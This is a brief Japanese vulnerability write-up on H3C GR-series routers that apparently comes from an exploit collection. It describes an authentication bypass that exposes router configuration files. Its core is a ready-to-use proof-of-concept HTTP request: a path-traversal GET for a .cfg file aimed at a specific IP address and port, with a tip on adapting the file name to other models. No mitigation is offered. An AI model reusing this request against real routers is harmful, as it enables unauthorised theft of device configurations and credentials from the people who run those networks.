製品: GRシリーズルーター
バージョン: 全て
評価: 高リスク
ウェブサイト: http://www.h3c.com/
危険性: 攻撃者はこの脆弱性を悪用し、特別なリクエストパケットを構築して身元確認をバイパスすることで、ルーターから機密情報を取得する可能性があります。
原理: ルーターがディレクトリアクセスおよび関連ファイルの認証を行っていないため。
exp:
注: POC内のファイル名の拡張子を変更する必要があります(例: GR8300.cfg)。
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image